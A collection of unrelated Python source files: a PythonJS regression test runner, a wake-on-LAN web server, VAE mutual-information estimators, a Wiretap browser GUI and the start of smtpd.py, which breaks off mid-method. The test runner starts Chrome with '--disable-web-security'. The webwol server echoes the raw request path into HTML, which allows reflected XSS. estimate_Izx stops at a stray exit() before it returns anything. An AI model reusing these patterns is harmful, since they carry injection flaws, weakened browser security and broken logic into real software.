cfg = '{"name":"test", "main":"%s.html", "window":{"width":1200, "height":700}}' %filename
write("/tmp/package.json", cfg)
run_command("%s /tmp" %nodewebkit, nodewebkit_workaround=True)
else:
## chrome-extension that won't force you to close your browser windows when deving: `Allow-Control-Allow-Origin:*`
## this still fails with iframes that do not allow cross origin.
cmd = [
'google-chrome',
'--app=file:///tmp/%s.html'%filename,
'--allow-file-access-from-files', ## only takes affect if chrome is closed
'--allow-file-access', ## only takes affect if chrome is closed
'--disable-web-security' ## only takes affect if chrome is closed
]
## non-blocking, TODO check for chrome extension that allows output of console.log to stdout
subprocess.check_call(cmd)
table_header = "%-12.12s %-28.28s"
table_cell = '%-6.6s'
def run_test_on(filename):
"""run one test and returns the number of errors"""
if not show_details:
f = open(filename)
comment = f.readline().strip(" \n\"'")
f.close()
print(table_header % (filename[2:-3], comment), end='')
sum_errors = {}
if filename.endswith('.html'):
run_html_test( filename, sum_errors )
return sum_errors
def display(function):
global _test_description
_test_description = function.__doc__
if show_details:
print('\n<%s>\n' % function.__doc__)
errors = function(filename)
if errors:
if not show_details:
print(table_cell % ''.join('%s%d' % (k[0], v)
for k, v in errors.items()),
end='')
else:
if not show_details:
print(table_cell % 'OK', end='')
sys.stdout.flush()
for k, v in errors.items():
sum_errors[k] = sum_errors.get(k, 0) + v
if show_details:
print('-'*77)
if 'requirejs' not in filename and not filename.startswith('./go/'):
display(run_python_test_on)
display(run_python3_test_on)
if pypy_runnable:
display(run_pypy_test_on)
if old_pypy_runnable:
display(run_old_pypy_test_on)
global js
do_js_test = not filename.startswith( ('./go/', './asm/', './rust/', './c++') )
if do_js_test:
js = translate_js(
filename,
javascript=True,
multioutput=filename.startswith('./threads/' or filename.startswith('./bench/webworker'))
)
if rhino_runnable:
display(run_pythonjs_test_on)
if node_runnable:
display(run_pythonjs_test_on_node)
if nodewebkit_runnable:
display(run_pythonjs_test_on_nodewebkit)
## TODO more optimized js settings pythonjs-minimal.js ##
#if '--no-javascript-mode' not in sys.argv and do_js_test:
# js = translate_js(filename, javascript=True, multioutput=filename.startswith('./threads/' or filename.startswith('./bench/webworker')))
# if rhino_runnable:
# display(run_pythonjsjs_test_on)
# if node_runnable:
# display(run_pythonjsjs_test_on_node)
# if nodewebkit_runnable:
# display(run_pythonjsjs_test_on_nodewebkit)
if 'requirejs' not in filename:
if dart_runnable:
js = translate_js(filename, javascript=False, dart=True)
display(run_pythonjs_dart_test_on_dart)
if dart2js_runnable and node_runnable:
js = translate_js(filename, javascript=False, dart=True)
display(run_pythonjs_dart_test_on_node)
if coffee_runnable and node_runnable:
js = translate_js(filename, javascript=False, dart=False, coffee=True)
display(run_pythonjs_coffee_test_on_node)
if luajs_runnable and node_runnable:
js = translate_js(filename, luajs=True)
display(run_pythonjs_luajs_test_on_node)
if lua_runnable:
js = translate_js(filename, lua=True)
display(run_pythonjs_lua_test_on_lua)
if luajit_runnable:
js = translate_js(filename, lua=True)
display(run_pythonjs_lua_test_on_luajit)
if go_runnable:
js = translate_js(filename, go=True)
display(run_pythonjs_go_test)
if gopherjs_runnable:
js = translate_js(filename, gopherjs=True)
display(run_pythonjs_gopherjs_test)
if rust_runnable:
js = translate_js(filename, rust=True)
display(run_pythonjs_rust_test)
if cpp_runnable:
js = translate_js(filename, cpp=True)
display(run_pythonjs_cpp_test)
print()
return sum_errors
def run():
"""Run all the tests or the selected ones"""
if not show_details:
headers = ["Py-\nthon2", "Py-\nthon3"]
if pypy_runnable:
headers.append("PyPy\n")
if old_pypy_runnable:
headers.append("PyPy\n1.9")
if rhino_runnable:
headers.append("JS\nRhino")
if node_runnable:
headers.append("JS\nNode")
if nodewebkit_runnable:
headers.append("JS\nWebkit")
if rhino_runnable:
headers.append("JSJS\nRhino")
if node_runnable:
headers.append("JSJS\nNode")
if nodewebkit_runnable:
headers.append("JSJS\nWebkit")
if dart_runnable:
headers.append("Dart\nDart")
if node_runnable:
if dart2js_runnable:
headers.append("Dart\nNode")
if coffee_runnable:
headers.append("Coffe\nNode")
if luajs_runnable:
headers.append("LuaJS\nNode")
if lua_runnable:
headers.append("Lua\nLua")
if luajit_runnable:
headers.append("Lua\nJIT")
if go_runnable:
headers.append("Go\n-")
if rust_runnable:
headers.append("Rust\n-")
print(table_header % ("", "Regtest run on")
+ ''.join(table_cell % i.split('\n')[0]
for i in headers)
)
print(table_header % ("", "")
+ ''.join(table_cell % i.split('\n')[1]
for i in headers
)
)
errors = []
total_errors = {}
for filename in files():
if show_details:
if os.path.abspath(filename) not in argv:
continue
print('*'*77)
print(filename)
if filename.startswith('./bench/'):
start_benchmark( os.path.split(filename)[-1] )
sum_errors = run_test_on(filename)
if sum_errors:
errors.append(filename)
for k, v in sum_errors.items():
total_errors[k] = total_errors.get(k, 0) + v
if filename.startswith('./bench/'):
end_benchmark( os.path.split(filename)[-1] )
print()
if errors:
nr_errors = 0
if not show_details:
print("To see details about errors, run the commands:")
for i in errors:
print('\t%s %s' % (sys.argv[0], i))
print("\nSummary of errors:")
for k, v in total_errors.items():
print('\t%d %s' % (v, k))
if k in ('Error', 'Translation error'):
nr_errors += v
if nr_errors == 0:
print("\nRegression tests run fine but with warnings")
sys.exit(nr_errors)
else:
print("Regression tests run fine")
sys.exit(0)
run()
|
|
#!/usr/bin/env python
"""
webwol
Generates wake-on-lan packets via a web interface. Useful for WOL when you're on
a different subnet, over a VPN, via an HTTP interface etc.
A secondary goal of this tool is to minimize external dependencies required, so
that deployment is trivial and can happen anywhere that Python can run. As a
result, some of this code is nasty (see: HTML templating via string interpolation,
manual response code generation, etc). This tradeoff is intentional, as the
interface for this tool is designed to be as simple as possible and therefore
can be a bit of a mess to create in the name of packaging and deployment
simplicity.
"""
import argparse
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import codecs
import json
import logging
import re
import socket
import sys
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
# python3-compatible shim for checking if a thing is a string
try:
basestring
except NameError:
basestring = str
HTML_TEMPLATE = """
<html>
<head>
<title>WebWol - One-touch Wake-On-Lan Interface</title>
<style>
body {
margin: 0;
padding: 1em;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
}
a, a:visited, a:hover {
color: #33f;
text-decoration: none;
}
.flash {
border: 2px #fff solid;
border-radius: 4px;
color: #191919;
display: inline-block;
padding: 0.5em;
white-space: pre-wrap;
}
.flash code {
color: #39393A;
font-size: larger;
}
.success {
background-color: #0d1;
border-color: #0a0;
}
.warning {
background-color: #f0ad4e;
border-color: #c08d1e;
}
.error {
background-color: #d10;
border-color: #a10;
}
.mac {
color: #666;
margin-left: 0.50em;
}
</style>
</head>
<body>
<h1>WebWol</h1>
%s
</body>
</html>
"""
def build_webwol_request_handler(wol_config):
class WebWolHTTPRequestHandler(BaseHTTPRequestHandler):
wol_hosts = wol_config
def write_response(self, response):
self.wfile.write((HTML_TEMPLATE % response).encode('UTF-8'))
def generate_wol_list(self):
wol_idx = "\n".join([
"<li><a href='/%s'>%s</a><code class='mac'>[%s]</code></li>" % (host, host, mac)
for (host, mac) in self.wol_hosts.items()])
return "<ul>\n%s\n</ul>" % wol_idx
def do_GET(self):
response = ""
wol_host = unquote(self.path[1:])
if self.path != "/" and wol_host in self.wol_hosts:
# send a WOL request
wol_mac = self.wol_hosts[wol_host]
try:
send_wol(self.wol_hosts[wol_host])
except Exception as e:
self.send_response(500)
response += "<div class='flash error'>"
response += "There was an error sending a wake-on-lan packet "
response += "to <code>%s (%s)</code>. " % (wol_host, wol_mac)
response += "Please try again or check the webwol "
response += "logs for errors."
response += "</div>"
logging.error(e)
else:
self.send_response(200)
response += "<div class='flash success'>"
response += "Successfully sent wake-on-lan packet "
response += "to <code>%s (%s)</code>. " % (wol_host, wol_mac)
response += "</div>"
elif self.path != "/":
# Return a 404 and let the user know we couldn't find that host,
# then write the index
self.send_response(404)
response += "<div class='flash warning'>"
response += "Could not find configuration for host <code>%s</code>. " % wol_host
response += "Choose one from the list below."
response += "</div>"
else:
# Write out the index
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
response += "<p>Click a host below to send a Wake-On-Lan request.</p>"
response += self.generate_wol_list()
self.write_response(response)
return WebWolHTTPRequestHandler
def format_wol(mac):
mac = "".join(mac.split(":"))
msg = ("FFFFFFFFFFFF%s" % (mac*16)).encode('ascii')
raw_msg = codecs.decode(msg, "hex_codec")
return raw_msg
def send_wol(mac):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
wol_msg = format_wol(mac)
logging.info("Sending magic packet to 255.255.255.255 for %s" % mac)
s.sendto(wol_msg, ("255.255.255.255", 9))
def build_http_server(args, wol_config):
server_address = (args.bind_address, args.port)
request_handler = build_webwol_request_handler(wol_config)
server = HTTPServer(server_address, request_handler)
return server
def build_arg_parser():
description = "Presents a web interface for sending one-click wake-on-lan packets to pre-defined targets"
parser = argparse.ArgumentParser(description=description)
parser.add_argument("config_file",
help="The configuration file to read wake-on-lan targets from")
parser.add_argument("-b", "--bind-address",
dest="bind_address",
default="0.0.0.0",
help="The address to bind to. Default: %(default)s")
parser.add_argument("-p", "--port",
dest="port",
type=int,
default=10080,
help="The port to listen on. Default: %(default)s")
parser.add_argument('-v', '--verbose',
dest="loglevel",
action="store_const", const=logging.DEBUG,
default=logging.INFO,
help="Verbose output")
return parser
def load_config(config_path):
logging.debug("Reading configuration from %s" % config_path)
with open(config_path) as f:
config_contents = f.read()
return json.loads(config_contents)
def reject_config(config):
mac_re = re.compile("([0-9a-f]{2}:){5}[0-9a-f]{2}")
reasons = []
if not all((isinstance(v, basestring) for v in config.values())):
reasons.append("""Please specify configuration as a key:value pairs of strings, like:
{
"moonbase": "fa:ce:de:ed:01:23",
"sadcow": "de:ad:be:ef:de:ef"
}""")
else:
for mac in config.values():
if not mac_re.match(mac):
reasons.append("""I'm bad at parsing MAC addresses and "%s" did not look like a MAC address to me.
Please format MAC addresses like 12:34:56:78:90:ab.""" % mac)
return reasons
if __name__ == "__main__":
parser = build_arg_parser()
args = parser.parse_args()
log_format = ""
logging.basicConfig(level=args.loglevel, format=log_format)
wol_config = load_config(args.config_file)
reject_reasons = reject_config(wol_config)
if reject_reasons:
logging.error("Failed to parse config from %s" % args.config_file)
for reason in reject_reasons:
logging.error(reason)
sys.exit(1)
server = build_http_server(args, wol_config)
server.serve_forever()
|
|
from typing import Callable, Generator, Iterator, Union, Optional
import warnings
import numpy as np
import tensorflow as tf
from sklearn.datasets import load_digits
from sklearn.decomposition import PCA
from sklearn.metrics.cluster import entropy as entropy1D
from tensorflow_probability.python import distributions as tfd
from odin.utils import one_hot
from odin.bay.vi import VAE, RVconf, NetConf, Beta10VAE, FactorVAE
from odin.fuel import dSprites
from odin.networks import get_networks, get_optimizer_info
from tqdm import tqdm
import torch
from sklearn.feature_selection import mutual_info_classif, mutual_info_regression
from sklearn.metrics import mutual_info_score
np.random.seed(1)
tf.random.set_seed(1)
def estimate_Izx(fn_px_z: Callable[[tf.Tensor], tfd.Distribution],
pz: tfd.Distribution,
n_samples_z: int = 10000,
n_mcmc_x: int = 100,
batch_size: int = 32,
verbose: bool = True):
log_px_z = []
prog = tqdm(desc='I(Z;X)',
total=n_samples_z * n_mcmc_x,
unit='samples',
disable=not verbose)
for start in range(0, n_samples_z, batch_size):
batch_z = min(n_samples_z - start, batch_size)
z = pz.sample(batch_z)
px_z = fn_px_z(z)
batch_llk = []
for start in range(0, n_mcmc_x, batch_size):
batch_x = min(n_mcmc_x - start, batch_size)
x = px_z.sample(batch_x)
batch_llk.append(px_z.log_prob(x))
prog.update(batch_z * batch_x)
batch_llk = tf.concat(batch_llk, axis=0)
log_px_z.append(batch_llk)
## finalize
prog.clear()
prog.close()
log_px_z = tf.concat(log_px_z, axis=1) # [n_mcmc_x, n_samples_z]
## calculate the MI
log_px = tf.reduce_logsumexp(log_px_z, axis=1, keepdims=True) - \
tf.math.log(tf.cast(n_samples_z, tf.float32))
H_x = tf.reduce_mean(log_px)
print(H_x)
exit()
mi = tf.reduce_mean(log_px_z - log_px)
return mi
def estimate_Izy(X_y: Union[tf.data.Dataset, Generator, Iterator],
fn_qz_x: Callable[[tf.Tensor], tfd.Distribution],
n_samples: int = 10000,
n_mcmc: int = 100,
batch_size: int = 32,
verbose: bool = True):
## process the data into mini batches
if not isinstance(X_y, (tf.data.Dataset, Generator, Iterator)):
X, y = X_y
if not isinstance(X, tf.data.Dataset):
X = tf.data.Dataset.from_tensor_slices(X).batch(batch_size)
if not isinstance(y, tf.data.Dataset):
y = tf.data.Dataset.from_tensor_slices(y).batch(batch_size)
X_y = tf.data.Dataset.zip((X, y))
if isinstance(X_y, tf.data.Dataset):
X_y = X_y.repeat(-1).shuffle(1000)
X_y = iter(X_y)
## iterate the dataset until have enough n_samples
count = 0
log_qz_x = []
qy = []
prog = tqdm(desc='I(Z;Y)',
total=n_samples * n_mcmc,
unit='samples',
disable=not verbose)
while count < n_samples:
## step 1: sample q(x, y)
try:
X, y = next(X_y)
except StopIteration:
warnings.warn(f'Not enough data for {n_samples} samples.')
break
batch_x = min(X.shape[0], n_samples - count)
X = X[:batch_x]
y = y[:batch_x]
qy.append(y)
qz_x = fn_qz_x(X)
## step 2: sample q(z|x)
batch_llk_qz = []
for start in range(0, n_mcmc, batch_size):
batch_z = min(n_mcmc - start, batch_size)
z = qz_x.sample(batch_z)
llk_qz = qz_x.log_prob(z)
batch_llk_qz.append(llk_qz)
## update progress
prog.update(batch_z * batch_x)
## step 4: aggregate the log-likelihoods
batch_llk_qz = tf.concat(batch_llk_qz, axis=0)
log_qz_x.append(batch_llk_qz)
count += batch_x
## finalizing results
prog.clear()
prog.close()
log_qz_x = tf.concat(log_qz_x, axis=1) # [n_mcmc, n_samples]
qy = tf.concat(qy, axis=0)
## Calculate I(Z; Y) - H(Z)
I_zy = {} # for each factor
n_factors = qy.shape[1]
for i in range(n_factors):
y = np.asarray(qy[:, i], dtype=np.int32)
I_zyi = {} # for each label of the factor
labels = np.unique(y)
for yk in labels:
ids = (y == yk)
K = np.sum(ids)
log_qz_xk = tf.boolean_mask(log_qz_x, ids, axis=1)
log_qz_xk = tf.reduce_logsumexp(log_qz_xk, axis=1) - tf.math.log(
tf.constant(K, dtype=tf.float32))
I_zyi[yk] = tf.reduce_mean(log_qz_xk, axis=0)
# average among labels within a factor
I_zyi = sum(v for v in I_zyi.values()) / len(labels)
I_zy[i] = I_zyi
# average among all factors
I_zy = np.array(list(I_zy.values()))
I_zy = np.mean(I_zy)
## giga
return I_zy
def giga(X_y: Union[tf.data.Dataset, Generator, Iterator],
fn_qz_x: Callable[[tf.Tensor], tfd.Distribution],
fn_px_z: Callable[[tf.Tensor], tfd.Distribution],
pz: Optional[tfd.Distribution] = None,
n_samples: int = 10000,
n_mcmc: int = 100,
batch_size: int = 32,
adjusted: bool = True,
verbose: bool = True):
C_mcmc = tf.math.log(tf.constant(n_mcmc, dtype=tf.float32))
## process the data into mini batches
if not isinstance(X_y, (tf.data.Dataset, Generator, Iterator)):
X, y = X_y
if not isinstance(X, tf.data.Dataset):
X = tf.data.Dataset.from_tensor_slices(X).batch(batch_size)
if not isinstance(y, tf.data.Dataset):
y = tf.data.Dataset.from_tensor_slices(y).batch(batch_size)
X_y = tf.data.Dataset.zip((X, y))
if isinstance(X_y, tf.data.Dataset):
X_y = X_y.repeat(-1).shuffle(1000)
X_y = iter(X_y)
## iterate the dataset until have enough n_samples
count = 0
log_qz_x = []
log_px_z = []
log_pz = []
qy = []
prog = tqdm(desc='GIGA',
total=n_samples * n_mcmc,
unit='samples',
disable=not verbose)
while count < n_samples:
## step 1: sample q(x, y)
try:
X, y = next(X_y)
except StopIteration:
warnings.warn(f'Not enough data for {n_samples} samples.')
break
batch_x = min(X.shape[0], n_samples - count)
X = X[:batch_x]
y = y[:batch_x]
qy.append(y)
qz_x = fn_qz_x(X)
# infer the prior of z
if pz is not None:
pass
elif hasattr(qz_x, 'KL_divergence'):
pz = qz_x.KL_divergence.prior
else:
pz = tfd.Normal(tf.zeros(qz_x.event_shape), 1., dtype=qz_x.dtype)
## step 2: sample q(z|x)
batch_llk_px = []
batch_llk_qz = []
batch_llk_pz = []
for start in range(0, n_mcmc, batch_size):
batch_z = min(n_mcmc - start, batch_size)
z = qz_x.sample(batch_z)
llk_qz = qz_x.log_prob(z)
batch_llk_qz.append(llk_qz)
llk_pz = pz.log_prob(z)
batch_llk_pz.append(llk_pz)
z = tf.reshape(z, (-1, z.shape[-1]))
## step 3: calculate log(p(x|z))
px_z = fn_px_z(z)
llk_x = px_z.log_prob(px_z.sample())
llk_x = tf.reshape(llk_x, (batch_z, -1))
batch_llk_px.append(llk_x)
## update progress
prog.update(batch_z * batch_x)
## step 4: aggregate the log-likelihoods
batch_llk_qz = tf.concat(batch_llk_qz, axis=0)
log_qz_x.append(batch_llk_qz)
batch_llk_pz = tf.concat(batch_llk_pz, axis=0)
log_pz.append(batch_llk_pz)
batch_llk_px = tf.concat(batch_llk_px, axis=0)
log_px_z.append(batch_llk_px)
count += batch_x
## finalizing results
prog.clear()
prog.close()
log_px_z = tf.concat(log_px_z, axis=1) # [n_mcmc, n_samples]
log_qz_x = tf.concat(log_qz_x, axis=1) # [n_mcmc, n_samples]
log_pz = tf.concat(log_pz, axis=1) # [n_mcmc, n_samples]
qy = tf.concat(qy, axis=0)
n_factors = qy.shape[1]
## Calculate I(X; Z)
log_pxz = log_px_z + log_pz - log_qz_x
log_px = tf.reduce_logsumexp(log_pxz, axis=0, keepdims=True) - C_mcmc
log_qx = tf.math.log(1. / n_samples)
pxz = tf.math.exp(log_pxz - log_qx)
I_xz = pxz * (log_px_z - log_px) # [n_mcmc, n_samples]
# entropy of x
H_x = tf.reduce_mean(-pxz * log_px)
# entropy of z
H_z = tf.reduce_mean(-tf.math.exp(log_pz - log_qz_x) * log_pz)
I_xz = tf.reduce_mean(I_xz, axis=0) # [n_samples]
# I_xz = I_xz / tf.math.sqrt(H_x * H_z)
I_xz = tf.reduce_mean(I_xz)
## Calculate I(Z; Y) - H(Z)
I_zy = {} # for each factor
for i in range(n_factors):
y = np.asarray(qy[:, i], dtype=np.int32)
I_zyi = {}
labels = np.unique(y)
for yk in labels:
ids = (y == yk)
K = np.sum(ids)
log_qz_xk = tf.boolean_mask(log_qz_x, ids, axis=1)
log_qz_xk = tf.reduce_logsumexp(log_qz_xk, axis=1) - tf.math.log(
tf.constant(K, dtype=tf.float32))
I_zyi[yk] = tf.reduce_mean(log_qz_xk, axis=0)
# average among labels within a factor
I_zyi = sum(v for v in I_zyi.values()) / len(labels)
I_zy[i] = I_zyi
# average among all factors
H_y = np.array([entropy1D(qy[:, i]) for i in range(n_factors)])
I_zy = np.array(list(I_zy.values()))
I_zy = np.mean(I_zy / H_y)
## giga
return I_xz + I_zy
|
|
"""Provides a Qt-based GUI for browsing Wiretap servers and nodes.
@author Brendan Holt
@date May 2014
@todo Implement node creation, deletion, and display filters.
@defgroup modWiretapBrowser WiretapBrowser
@{
"""
import sys
from PySide import QtGui
from wiretap import WireTapClientInit, WireTapClientUninit, WireTapException
import WiretapBrowserUI
from WiretapView import NodeItem
class BrowserDialog(QtGui.QDialog, WiretapBrowserUI.Ui_browserDialog):
"""A dialog window for browsing to a Wiretap \c{CLIP} container node
(either a \c{LIBRARY} or a \c{REEL}) using a tree view of the node
hierarchy.
@details Content such as clip and setup nodes are not shown (disabled in
NodeSelected() and \ref modWiretapView).
"""
def __init__(self, parent=None):
"""Initializes a Wiretap browser dialog.
@param[in] parent \c{(QtGui.QWidget)} The parent widget for this
dialog.
"""
super(BrowserDialog, self).__init__(parent)
self.setupUi(self)
self.nodeTreeView.Populate()
self.nodeItem = None
self.openButton = self.confirmButtonBox.button(
QtGui.QDialogButtonBox.Open)
self.openButton.setEnabled(False)
# Node selection signal-slot
self.__InitTreeSelectionModel()
# Refresh buttons
self.refreshButton.clicked.connect(self.Refresh)
self.refreshAllButton.clicked.connect(self.RefreshAll)
self.pathEdit.textEdited.connect(self.CheckPathFormat)
self.idButton.toggled.connect(self.ToggleNodeID)
#self.pathEdit.setReadOnly(True) # prevent users from wrecking format
def __InitTreeSelectionModel(self):
"""Initializes the item selection model for the tree view and connects
the \c{currentRowChanged} signal to a node selection slot.
"""
selectionModel = QtGui.QItemSelectionModel(self.nodeTreeView.model())
selectionModel.currentRowChanged.connect(self.NodeSelected)
self.nodeTreeView.setSelectionModel(selectionModel)
def IsValidPathFormat(self, text):
"""Checks whether the node path is of the appropriate depth for a
library or reel node and corrects matching hostnames with improper
case.
@param[in] text \c{(str)} The node path from the browser's text box.
@return \c{(bool)} Whether the node path has a valid format.
@todo Implement browsing to the node as you type. However, there can
be significant delays depending on the server selected.
"""
minSegments = 4 # at least HOST/VOLUME/PROJECT/LIBRARY
maxSegments = 5 # at most HOST/VOLUME/PROJECT/LIBRARY/REEL
segments = [seg for seg in text.split('/') if seg]
# Get the hostname from the first segment
try:
hostname = segments[0]
except IndexError:
return False
# Hostname must be in the current list of detected servers and is case-
# sensitive.
try:
fixedHostname = self.FixHostnameCase(hostname)
except ValueError:
return False
# Fix the case of the hostname
if hostname != fixedHostname:
cursorPos = self.pathEdit.cursorPosition()
self.pathEdit.setText(text.replace(hostname, fixedHostname, 1))
self.pathEdit.setCursorPosition(cursorPos)
# TO DO: Browse to node as you type.
#self.nodeTreeView.GoTo(...)
# Too few or too many path segments
if len(segments) < minSegments or len(segments) > maxSegments:
return False
return True
def FixHostnameCase(self, hostname):
"""Fixes a Wiretap hostname that was spelled correctly but may have
improper case.
@details Wiretap hostnames are case-sensitive for initiating server
connections.
@param[in] hostname \c{(str)} The hostname whose case may need fixing.
@throws Raises a <a href="http://docs.python.org/2.6/library/exceptions.html#exceptions.ValueError" target="_blank">
ValueError</a> if the hostname is misspelled.
@return \c{(str)} The corrected hostname.
"""
for hn in self.nodeTreeView.manager.hostnames:
if hostname.lower() == hn.lower():
return hn
raise ValueError("Invalid hostname: " + hostname)
#--------------------------------------------------------------------------
# SLOTS
#--------------------------------------------------------------------------
def NodeSelected(self, current, previous):
"""Updates the node path text box and determines if the current node
is a container type that can be returned.
@details This method is a Qt slot for when a new Wiretap node is
selected in the tree view.
@param[in] current \c{(QtCore.QmodelIndex)} The current row's model
index.
@param[in] previous \c{(QtCore.QmodelIndex)} The previous row's model
index.
"""
model = current.model()
self.nodeItem = model.itemFromIndex(current)
try: # attempt access on NodeItem attributes
if self.idButton.isChecked():
self.pathEdit.setText(self.nodeItem.nodePath)
else:
self.pathEdit.setText(self.nodeItem.displayPath)
if self.nodeItem.nodeType in NodeItem.CLIP_CONTAINERS:
self.openButton.setEnabled(True)
else:
self.openButton.setEnabled(False)
except AttributeError: # may occasionally select dummy item
pass
def Refresh(self):
"""Refreshes the children of the currently selected node.
@details The collapsed/expanded states of the child nodes will not be
retained. This method is a Qt slot for when the "Refresh"
button is clicked.
"""
if self.nodeItem:
index = self.nodeItem.index()
isExpanded = self.nodeTreeView.isExpanded(index)
try:
self.nodeItem.ResetChildren()
except AttributeError: # probably not a NodeItem
pass
self.nodeTreeView.collapse(index) # hide dummy node
self.nodeTreeView.expand(index) # forces reloading of children
self.nodeTreeView.setExpanded(index, isExpanded) # original state
def RefreshAll(self):
"""Collapses all node trees and refreshes the Wiretap server list.
@details This method is a Qt slot for when the "Refresh All" button is
clicked.
"""
self.nodeTreeView.Reset()
self.__InitTreeSelectionModel()
def CheckPathFormat(self, text):
"""Enables/disables the dialog-accepted ("Open") button depending on
whether the node path has the correct format.
@details This method is a Qt slot for when text is manually edited in
the text box.
@param[in] text \c{(str)} The edited text to be checked.
"""
if self.IsValidPathFormat(text):
self.openButton.setEnabled(True)
else:
self.openButton.setEnabled(False)
def ToggleNodeID(self, checked):
"""Converts a node ID to a display path in the path text box, and vice
versa.
@details If a reel or clip has a blank display name, then consecutive
slashes may appear in portions of the path. When node ID mode
is activated, reels and clips will show up as hash IDs instead
of display names. This method is a Qt slot for when the ID
button is clicked.
@param[in] checked \c{(bool)} Whether the node ID toggle button is in
an activated state.
"""
# Navigate to the current path using the previous node/display path
# style (opposite of checked)
self.nodeTreeView.GoTo(self.pathEdit.text(), not checked)
# When the ID toggle button is activated, make the text bold
if checked:
font = self.idButton.font()
font.setBold(True)
else:
font = self.idButton.font()
font.setBold(False)
self.idButton.setFont(font)
def ChooseContainerNode(parent=None):
"""Launches a Wiretap browser and returns the selected node path.
@param[in] parent \c{(QtGui.QWidget)} The parent widget for this dialog.
@throws Raises a \c{WireTapException} if the Wiretap client failed to
initialize.
@return \c{(str)} The Wiretap server concatenated with the selected node ID
or display path. The result is an empty string if the dialog was
canceled.
"""
if not WireTapClientInit():
raise WireTapException("Unable to initialize the Wiretap client API.")
browser = BrowserDialog(parent)
status = browser.exec_()
WireTapClientUninit()
if status == QtGui.QDialog.Accepted:
return browser.pathEdit.text()
return ''
def SplitNodePath(nodePath):
"""Splits a Wiretap Browser node path into a Wiretap server name and node
ID.
@details A "node path" combines a Wiretap server name and a node ID,
yielding a single string. When splitting a node path, this
function assumes that the text before the first slash is the
server name.
@param[in] nodePath \c{(str)} A non-standard conjunction of the Wiretap
server name and node ID in the form of
\c{HOST:PRODUCT/VOLUME/PROJECT/LIBRARY/[REEL]/CLIP}.
@return \c{(tuple)} The hostname and node ID (the latter always has a
leading slash).
"""
try: # split server from the node ID
hostname, nodeID = nodePath.split('/', 1)
except ValueError: # only the server present
hostname = nodePath
nodeID = ''
return hostname, '/' + nodeID
## @cond TEST
def main():
"""A test harness for launching the Wiretap browser in standalone mode."""
if not WireTapClientInit():
raise WireTapException("Unable to initialize the Wiretap client API.")
app = QtGui.QApplication(sys.argv)
browser = BrowserDialog()
browser.show()
# Cleanup
appStatus = app.exec_()
WireTapClientUninit()
sys.exit(appStatus)
## @endcond
if __name__ == '__main__':
main()
## @}
|
|
#!/app/.heroku/bin/python2.7
"""An RFC 2821 smtp proxy.
Usage: %(program)s [options] [localhost:localport [remotehost:remoteport]]
Options:
--nosetuid
-n
This program generally tries to setuid `nobody', unless this flag is
set. The setuid call will fail if this program is not run as root (in
which case, use this flag).
--version
-V
Print the version number and exit.
--class classname
-c classname
Use `classname' as the concrete SMTP proxy class. Uses `PureProxy' by
default.
--debug
-d
Turn on debugging prints.
--help
-h
Print this message and exit.
Version: %(__version__)s
If localhost is not given then `localhost' is used, and if localport is not
given then 8025 is used. If remotehost is not given then `localhost' is used,
and if remoteport is not given, then 25 is used.
"""
# Overview:
#
# This file implements the minimal SMTP protocol as defined in RFC 821. It
# has a hierarchy of classes which implement the backend functionality for the
# smtpd. A number of classes are provided:
#
# SMTPServer - the base class for the backend. Raises NotImplementedError
# if you try to use it.
#
# DebuggingServer - simply prints each message it receives on stdout.
#
# PureProxy - Proxies all messages to a real smtpd which does final
# delivery. One known problem with this class is that it doesn't handle
# SMTP errors from the backend server at all. This should be fixed
# (contributions are welcome!).
#
# MailmanProxy - An experimental hack to work with GNU Mailman
# <www.list.org>. Using this server as your real incoming smtpd, your
# mailhost will automatically recognize and accept mail destined to Mailman
# lists when those lists are created. Every message not destined for a list
# gets forwarded to a real backend smtpd, as with PureProxy. Again, errors
# are not handled correctly yet.
#
# Please note that this script requires Python 2.0
#
# Author: Barry Warsaw <[email protected]>
#
# TODO:
#
# - support mailbox delivery
# - alias files
# - ESMTP
# - handle error codes from the backend smtpd
import sys
import os
import errno
import getopt
import time
import socket
import asyncore
import asynchat
__all__ = ["SMTPServer","DebuggingServer","PureProxy","MailmanProxy"]
program = sys.argv[0]
__version__ = 'Python SMTP proxy version 0.2'
class Devnull:
def write(self, msg): pass
def flush(self): pass
DEBUGSTREAM = Devnull()
NEWLINE = '\n'
EMPTYSTRING = ''
COMMASPACE = ', '
def usage(code, msg=''):
print >> sys.stderr, __doc__ % globals()
if msg:
print >> sys.stderr, msg
sys.exit(code)
class SMTPChannel(asynchat.async_chat):
COMMAND = 0
DATA = 1
def __init__(self, server, conn, addr):
asynchat.async_chat.__init__(self, conn)
self.__server = server
self.__conn = conn
self.__addr = addr
self.__line = []
self.__state = self.COMMAND
self.__greeting = 0
self.__mailfrom = None
self.__rcpttos = []
self.__data = ''
self.__fqdn = socket.getfqdn()
try:
self.__peer = conn.getpeername()
except socket.error, err:
# a race condition may occur if the other end is closing
# before we can get the peername
self.close()
if err[0] != errno.ENOTCONN:
raise
return
print >> DEBUGSTREAM, 'Peer:', repr(self.__peer)
self.push('220 %s %s' % (self.__fqdn, __version__))
self.set_terminator('\r\n')
# Overrides base class for convenience
def push(self, msg):
asynchat.async_chat.push(self, msg + '\r\n')
# Implementation of base class abstract method
def collect_incoming_data(self, data):
self.__line.append(data)
# Implementation of base class abstract method
def found_terminator(self):
line = EMPTYSTRING.join(self.__line)
print >> DEBUGSTREAM, 'Data:', repr(line)
self.__line = []
if self.__state == self.COMMAND:
if not line:
self.push('500 Error: bad syntax')
return
method = None
i = line.find(' ')
if i < 0:
command = line.upper()
arg = None
else:
command = line[:i].upper()
arg = line[i+1:].strip()
method = getattr(self, 'smtp_' + command, None)
if not method:
self.push('502 Error: command "%s" not implemented' % command)
return
method(arg)
return
else:
if self.__state != self.DATA:
self.push('451 Internal confusion')
return
# Remove extraneous carriage returns and de-transparency according
# to RFC 821, Section 4.5.2.
data = []
for text in line.split('\r\n'):
if text and text[0] == '.':
data.append(text[1:])
else:
data.append(text)
self.__data = NEWLINE.join(data)
status = self.__server.process_message(self.__peer,
self.__mailfrom,
self.__rcpttos,
self.__data)
self.__rcpttos = []
self.__mailfrom = None
self.__state = self.COMMAND
